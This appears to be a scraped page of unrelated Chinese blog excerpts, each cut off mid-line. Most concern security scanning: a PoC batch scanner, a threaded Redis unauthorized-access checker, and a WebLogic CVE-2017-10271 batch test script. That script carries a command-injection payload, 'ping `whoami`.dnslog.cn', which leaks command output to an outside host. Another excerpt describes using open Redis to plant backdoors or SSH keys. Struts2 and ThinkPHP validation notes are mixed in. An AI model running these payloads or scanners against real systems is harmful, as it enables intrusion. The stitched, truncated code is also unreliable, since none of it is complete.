only poc , 再据结果利用EXP进一步测试: 支持 -u 单个url; -f 文本批量URL导入 url列表格式是https://www.baidu.com #! /usr/bin/env python # -*-coding:utf-8-*- import os import sys import Queue import getopt import logging import requests import threading logging.basicConfig( level=…

#coding:utf-8 import threading,Queue,sys,os class RedisUN(threading.Thread): def __init__(self,queue): threading.Thread.__init__(self) self._queue = queue def run(self): while True: if self._queue.empty(): break try: ########################## 代码放入这#…

1.说明 看到大家对weblogic漏洞这么热衷,于是也看看这个漏洞的测试方式. 找了几个安全研究员的博客分析,经过几天的摸索大体清楚漏洞由XMLDecoder的反序列化产生. 漏洞最早4月份被发现,10月份的漏洞是由于官方修复不完善导致被绕过. 嗯,又学习了很多知识. 2.批量测试脚本 # -*- coding: UTF-8 -*- import requests,sys,os help = ''' eg:CVE-2017-10271.py "ping \`whoami\`.dnslog.cv…

漏洞简介 简单来说,redis是一个数据库.在默认的配置下,redis绑定在0.0.0.0:6379,也就是说,如果服务器有公网ip,可以通过访问其公网ip的6379端口来操作redis.最为致命的是,redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器. 漏洞的危害 无密码验证登录redis后,可读取.删除.更改数据 攻击者可以通过redis读写文件,植入后门 如果redis以root权限运行,攻击者可以写入ssh公钥文件,然后即可远程ssh登录服务…

一.struts2文件上传 1.上传文件的时候要求必须使得表单的enctype属性设置为multipart/form-data,把它的method属性设置为post 2.上传单个文件的时候需要在Action类中添加属性并提供每个属性的标准get/set方法: private File uploadImage;//上传的文件 private String uploadImageContentType;//上传的文件类型 private String uploadImageFileName;//上传…

*$tablePrefix是定义在Model中的,优先级大于配置文件中,如果项目中表前缀全部比如为"a_",并且在配置文件中定义了 'DB_PREFIX'=>'a_' 后期如果在数据库中新建一个 b_temp表,这时候实例化temp 的时候如果不加处理,系统会查找a_temp,这个表不存在,这时候就需要在Temp模型中定义$tablePrefix='b_'; *批量验证:在Model里面写入代码:protected $patchValidate = true;输出:var_dum…

1.静态定义 在模型类里面预先定义好该模型的自动验证规则,我们称为静态定义. 举例说明,我们在模型类里面定义了$_validate属性如下: class UserModel extends Model{ protected $_validate = array( array('verify','require','验证码必须!'), //默认情况下用正则进行验证 array('name','','帐号名称已经存在!',0,'unique',1), // 在新增的时候验证name字段是否唯一 ar…

struts2 的验证框架validation简单,好用,但是input只能输出到jsp页面通过struts2的标签<s:fielderror  />才能取出,(EL应该也可以). 如果使用的是ajax访问,那么就比较悲剧,如何返回json数据以方便ajax交互. 开始想是不是可以直接将input以json方式输出,类似:<result name="input" type="json"></result> ,发现不行,因为type…

struts2框架验证(xml方式):    * 首先要从页面中获取对应的标签name属性的值,在动作类action中声明同名的属性,提供get和set方法        * 创建一个xml格式验证文件:        * 命名方式:ActionClassName-validation.xml,ActionClassName指的是动作类action的名称        * <validators>标签:根元素        * field:指定action中要校验的属性,实际上就是页面中表单的…

代码地址 import subprocess f = open('ips.txt', 'r') flines = f.readlines() vulnsrvs = 0 i = 1 for line in flines: host = line.split(":") ip = host[0].replace('\n','') port = host[1].replace('\n','') print "Try (" + str(i) +") "+…